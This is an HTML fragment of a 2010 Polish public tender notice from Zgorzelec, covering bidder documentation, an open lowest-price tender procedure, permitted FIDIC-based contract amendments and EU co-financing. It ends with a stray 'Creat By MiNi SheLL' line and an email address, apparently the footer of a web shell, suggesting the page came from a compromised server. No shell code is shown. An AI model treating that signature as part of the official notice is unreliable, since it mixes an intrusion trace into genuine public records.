<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Wypełniony i podpisany formularz ofertowy (zgodnie z  załącznikiem nr 1 do SIWZ),
2.  Wyceniony przedmiar robót (zgodnie z załącznikiem nr 1a do SIWZ)
3. Dowód wniesienia wadium.
4. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w 
    art. 22 ust. 1 ustawy Prawo Zamówien Publicznych
5. Pełnomocnictwo osoby lub osób reprezentujących Wykonawcę lub Wykonawców wspólnie 
      ubiegających się o udzielenie zamówienia (w przypadku konieczności załączenia do oferty 
      takiego pełnomocnictwa)
6. Formularz wskazujący którą część zamówienia Wykonawca powierzy do realizacji 
    Podwykonawcy.  
    (Wykonawca który zamierza samodzielnie wykonać zamówienie nie składa wraz z oferta   
     przedmiotowego formularza. W przypadku kiedy Wykonawca będzie korzystał z wiedzy i 
     doświadczenia innych podmiotów, a nie załączy przedmiotowego formularza do oferty, 
     Zamawiający nie będzie mógł uznać spełnienia przez Wykonawcę warunku posiadania wiedzy i 
     doświadczenia.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.    Zgodnie z zapisami art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, Zamawiający  
       przewiduje możliwość dokonania zmian istotnych postanowień zawartej umowy, przy czym 
       zakres tych zmian definiuje on  następująco:
a)	zmiany dokonane według zasad określonych w Klauzuli 13 Warunków Kontraktowych FIDIC;
b)	zmiana dokonana na podstawie art. 23 pkt 1 ustawy Prawo budowlane zmiana w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy;
c)	zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. b) ustawy Prawo budowlane uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego;
d)	zmiany dokonane zostały podczas wykonywania robót i nie odstępują               w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36 a ust. 5 ustawy Prawo budowlane i dokonane zostały zgodnie z zapisami art. 36a ust. 6 ustawy Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy Prawo budowlane;
e)	zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT.
f)	wystąpienie siły wyższej  określonej w Klauzuli 19 Warunków Kontraktowych FIDIC.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 59-900 Zgorzelec, ul. Domańskiego 7 
Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7, Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego                 w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com